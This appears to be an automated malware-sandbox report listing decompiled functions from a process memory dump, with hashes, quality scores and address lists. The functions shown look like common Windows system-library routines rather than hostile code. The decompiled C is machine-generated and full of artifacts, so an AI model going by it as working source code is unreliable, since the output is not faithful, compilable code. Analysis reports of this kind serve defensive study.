Opcode ID: ff1e3d09254689e88ac0db79399316fa521c864bdecc808950bf73b1dc601ce4
Instruction ID: a30abc641384471bd20a04d4653283a275efb0163d984f6d818904a2cdb3fae9
Opcode Fuzzy Hash: ff1e3d09254689e88ac0db79399316fa521c864bdecc808950bf73b1dc601ce4
Instruction Fuzzy Hash: E3318D75A24249AFD704DF28D845B9ABBE8FF08320F158296FD08CB341D671E980CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0525BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0525BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x5316100; // 0x16
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E05242280(0xd, 0x19f6f1a0);
				_t41 =  *0x53160f8; // 0x0
				if(_t41 != 0) {
					 *0x53160f8 =  *_t41;
					 *0x53160fc =  *0x53160fc + 0xffff;
				}
				E0523FFB0(_t41, 0x800, 0x19f6f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x53160f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L05244620(0x5316100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x5316100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0525bc36
0x0525bc42
0x0525bc45
0x0525bc4a
0x0525bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0525bc50
0x0525bc50
0x0525bc58
0x0525bc5a
0x0525bc60
0x00000000
0x00000000
0x0529a4f2
0x0529a4f6
0x00000000
0x00000000
0x00000000
0x0529a4fc
0x0525bc79
0x0525bc7e
0x0525bc86
0x0525bd16
0x0525bd20
0x0525bd20
0x0525bc8d
0x0525bc94
0x0525bcbd
0x0525bcca
0x0525bccb
0x0525bccc
0x0525bccd
0x0525bcce
0x0525bcd4
0x0525bcea
0x0525bcee
0x0525bcf2
0x0525bd00
0x0525bd04
0x00000000
0x0525bc96
0x0525bcab
0x0525bcaf
0x0525bd2c
0x0525bd2c
0x0525bd09
0x00000000
0x0525bd09
0x0525bcb1
0x0525bcb5
0x0525bcbb
0x00000000
0x00000000
0x00000000
0x0525bcbb

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bbe4491a6a3ea1465affc2b590b735207345a1b909fcc5510dbc196335e1252
Instruction ID: 98fae9bdb7c4133fd432fdc5ae8e70281a92e71be2cdc85b4a27dd3473b9845d
Opcode Fuzzy Hash: 7bbe4491a6a3ea1465affc2b590b735207345a1b909fcc5510dbc196335e1252
Instruction Fuzzy Hash: 3E31FF36A256169FCB01DFA8C4827A677A8FF08321F010078EC0ADF201EB78DA05CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05229100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05229100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x52ff6e8);
				E0527D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E052F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0527D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x53186c0; // 0x11407b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x53186b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E05242280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E052F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0526AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x531b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x53184c0;
										if(_t69 >=  *0x53184c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E052F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0522922A(_t82);
							_t53 = E05247D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E052F8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x53186c0; // 0x11407b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x53186b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x53186bc;
										_t72 = 0x53186b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E05229240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x53186c4;
									_t72 = 0x53186c0;
									L18:
									E05259B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x05229100
0x05229100
0x05229100
0x05229100
0x05229102
0x05229107
0x0522910c
0x05229110
0x05229115
0x05229136
0x05229143
0x052837e4
0x052837e4
0x05229149
0x0522914e
0x0522914e
0x05229117
0x0522911d
0x00000000
0x00000000
0x0522911f
0x05229125
0x00000000
0x05229151
0x05229158
0x0522915d
0x05229161
0x05229168
0x05283715
0x00000000
0x0522916e
0x0522916e
0x05229175
0x05229177
0x0522917e
0x0522917f
0x05229182
0x05229182
0x05229187
0x05229187
0x0522918a
0x0522918d
0x0522918f
0x05229192
0x05229195
0x05229198
0x05229198
0x05229198
0x0522919a
0x00000000
0x00000000
0x0528371f
0x05283721
0x05283727
0x0528372f
0x05283733
0x05283735
0x05283738
0x0528373b
0x0528373d
0x05283740
0x00000000
0x00000000
0x05283746
0x05283749
0x00000000
0x00000000
0x0528374f
0x05283751
0x00000000
0x00000000
0x05283757
0x05283759
0x0528375c
0x0528375c
0x0528375e
0x0528375e
0x05283761
0x05283764
0x00000000
0x00000000
0x05283766
0x05283768
0x052837a3
0x052837a3
0x052837a5
0x052837a7
0x052837ad
0x052837b0
0x052837b2
0x052837bc
0x052837c2
0x052837c2
0x052837b2
0x05229187
0x05229187
0x0522918a
0x0522918d
0x0522918f
0x05229192
0x05229195
0x00000000
0x05229195
0x00000000
0x05229187
0x0528376a
0x0528376a
0x0528376c
0x0528376c
0x0528376f
0x05283775
0x00000000
0x00000000
0x05283777
0x05283779
0x00000000
0x00000000
0x05283782
0x05283787
0x05283789
0x05283790
0x05283790
0x0528378b
0x0528378b
0x0528378b
0x05283792
0x05283795
0x05283795
0x05283798
0x05283798
0x0528379b
0x0528379b
0x052291a3
0x052291a9
0x052291b0
0x052291b4
0x052291b4
0x052291bb
0x052291c0
0x052291c5
0x052291c7
0x052837da
0x052291cd
0x052291cd
0x052291cd
0x052291d2
0x052291d5
0x05229239
0x05229239
0x052291d7
0x052291db
0x052291e1
0x052291e7
0x052291fd
0x05229203
0x0522921e
0x05229223
0x00000000
0x05229223
0x05229205
0x05229208
0x0522920c
0x05229214
0x05229214
0x052291e9
0x052291e9
0x052291ee
0x052291f3
0x052291f3
0x052291f3
0x052291e7
0x00000000
0x052291db
0x05229187
0x05229168

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926d908759fa59c474494e1c1b254e7ae831577f84aec56501da5569160e46bb
Instruction ID: eb09cae1365c5627da5e2dc1dd3fe4960a16a09a26088055c35da5af348baf64
Opcode Fuzzy Hash: 926d908759fa59c474494e1c1b254e7ae831577f84aec56501da5569160e46bb
Instruction Fuzzy Hash: D431F479A35256EFDB25DF6AC488BACFBF2BF49310F188159D5096B240C370A9C0CB55

Uniqueness

Uniqueness Score: -1.00%

Function 05251DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E05251DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0524F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L05244620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0524F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x05251dc2
0x05251dc5
0x05251dc7
0x05251dcc
0x05251dce
0x05251dd6
0x05251ddf
0x05251de0
0x05251de1
0x05251de5
0x05251de8
0x05251def
0x05251df0
0x05251df6
0x05251df7
0x05251dfe
0x05251e1a
0x00000000
0x00000000
0x05251e0b
0x05251e12
0x05251e12
0x05251e00
0x05251e00
0x05251e05
0x05251e1e
0x05251e23
0x0529570f
0x05295713
0x00000000
0x00000000
0x05295719
0x05295719
0x05251e2c
0x05251e2d
0x05251e2e
0x05251e2f
0x05251e31
0x05251e32
0x05251e35
0x05251e3d
0x05295723
0x0529573d
0x0529573d
0x00000000
0x05295723
0x05251e49
0x05251e4e
0x05251e4e
0x05251e09
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: bd62cb9ae5dc8fd294b0df4822304e1c87513588a39badb1d64fce6db5557f7b
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: D921DE32620109EFD725CF99CC84FABBBBDFF85660F104065ED459B210D634AE11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05240050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E05240050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x531d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E05259ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0526B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E052F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E05259702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x531b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x05240055
0x0524005d
0x05240062
0x0524006c
0x0524006f
0x05240074
0x0524007a
0x0524007a
0x05240080
0x05240080
0x05240087
0x0524008d
0x0524008f
0x05240093
0x05240095
0x0524009b
0x052400f8
0x052400fb
0x052400fc
0x052400ff
0x05240108
0x05240108
0x052400a2
0x052400a6
0x052400b3
0x052400bc
0x052400c5
0x052400ca
0x0528c01e
0x00000000
0x00000000
0x0528c02d
0x052400d5
0x052400d9
0x0528c03d
0x0528c046
0x0528c046
0x052400df
0x052400e2
0x052400ea
0x052400ef
0x052400f2
0x052400f6
0x05240111
0x05240117
0x05240117
0x00000000
0x052400f6
0x052400d0
0x052400d0
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15cacdef75eb058c303f1ecced51906a380a6198656f5909827e791ca734b9a0
Instruction ID: c4e50eb9ec82526b1663f4b2e0a23522be7dead5e909613822321bc30c5f1804
Opcode Fuzzy Hash: 15cacdef75eb058c303f1ecced51906a380a6198656f5909827e791ca734b9a0
Instruction Fuzzy Hash: 86318E31221B05CFD725CB28C848B66B3E6FF88714F14456DE59A8BB90EB75A841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 052A6C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E052A6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E05247D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x5317b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L05244620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0526F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E05247D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E05269AE0();
						_t23 = L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x052a6c0a
0x052a6c0f
0x052a6c10
0x052a6c13
0x052a6c15
0x052a6c19
0x052a6c1c
0x052a6c21
0x052a6c28
0x052a6c3a
0x052a6c2a
0x052a6c33
0x052a6c33
0x052a6c3f
0x052a6c48
0x052a6c4d
0x052a6c60
0x052a6c65
0x052a6c69
0x052a6c73
0x052a6c79
0x052a6c7f
0x052a6c86
0x052a6c90
0x052a6c94
0x052a6ca6
0x052a6cb2
0x052a6cbd
0x052a6cbd
0x052a6cc3
0x052a6cc7
0x052a6ccb
0x052a6cd0
0x052a6cd1
0x052a6ce2
0x052a6ce2
0x052a6c69
0x052a6ced

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdeacf74bf7f156a9b21fbe3be0b3eb146b79c16d4226c289b276b27acf074cd
Instruction ID: 79b496f05c74dd258ec8ce1482b623a374c2b9de55efea2f4c88b0fe447344a7
Opcode Fuzzy Hash: fdeacf74bf7f156a9b21fbe3be0b3eb146b79c16d4226c289b276b27acf074cd
Instruction Fuzzy Hash: 58219C72A20644ABD715DF68D944E2AB7A8FF48700F080069F909CB791DB34ED51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 052690AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E052690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0527D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0525E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L05244620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0526F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0525A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x052690af
0x052690b8
0x052690bb
0x052690bf
0x052690c2
0x052690c2
0x052690c8
0x052690cb
0x052690cd
0x052a14d7
0x052a14eb
0x052a14eb
0x00000000
0x052a14eb
0x052a14db
0x052a14e6
0x00000000
0x052a14f2
0x052a14e8
0x00000000
0x052a14e8
0x052690d8
0x052690da
0x052690dd
0x052690e5
0x00000000
0x05269139
0x052690fa
0x052690fe
0x05269142
0x00000000
0x05269142
0x05269104
0x05269107
0x0526910b
0x05269110
0x05269118
0x05269147
0x05269148
0x0526914f
0x05269150
0x05269151
0x05269152
0x05269156
0x0526915d
0x05269160
0x05269168
0x0526916c
0x052691bc
0x052691be
0x00000000
0x052691be
0x0526916e
0x05269173
0x05269176
0x00000000
0x00000000
0x0526917c
0x05269180
0x052691b5
0x00000000
0x052691b5
0x05269182
0x05269185
0x05269189
0x00000000
0x00000000
0x0526918e
0x05269190
0x05269198
0x00000000
0x00000000
0x052691a0
0x00000000
0x052691ad
0x052691ad
0x052691b0
0x052691b1
0x00000000
0x05269185
0x0526911a
0x0526911c
0x0526911f
0x05269125
0x05269127
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: de27738cf29e1a3ee83c2094072b06be8221b6f4026b20bab98193f0d8997d55
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: DC218071A20205EFDB20DF59C944EAAF7F8EF44710F1488AAE949A7200D770ED90CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05253B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E05253B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x53184c4; // 0x0
				_v12 = 1;
				_v8 =  *0x53184c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L05244620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x53184c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0526AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0526FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x53184c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x53184c4; // 0x0
					L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x05253b89
0x05253b96
0x05253ba1
0x05253bab
0x05253bb5
0x05253bb9
0x05296298
0x05253bbf
0x05253bc2
0x05253bc3
0x05253bc9
0x05253bca
0x05253bcc
0x05253bcd
0x05253bd4
0x05253bd6
0x05253bdb
0x05253bea
0x05253bf7
0x05253bfb
0x05253bff
0x05253c09
0x05253c0a
0x05253c0b
0x05253c0f
0x05253c14
0x05253c18
0x05253c18
0x05253bfb
0x05253c1b
0x05253c30
0x05253c30
0x05253c3d

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed931b30d615ffb5c01b3c4a0f54037aa17b23140ade7cf5b8b0438388bb653f
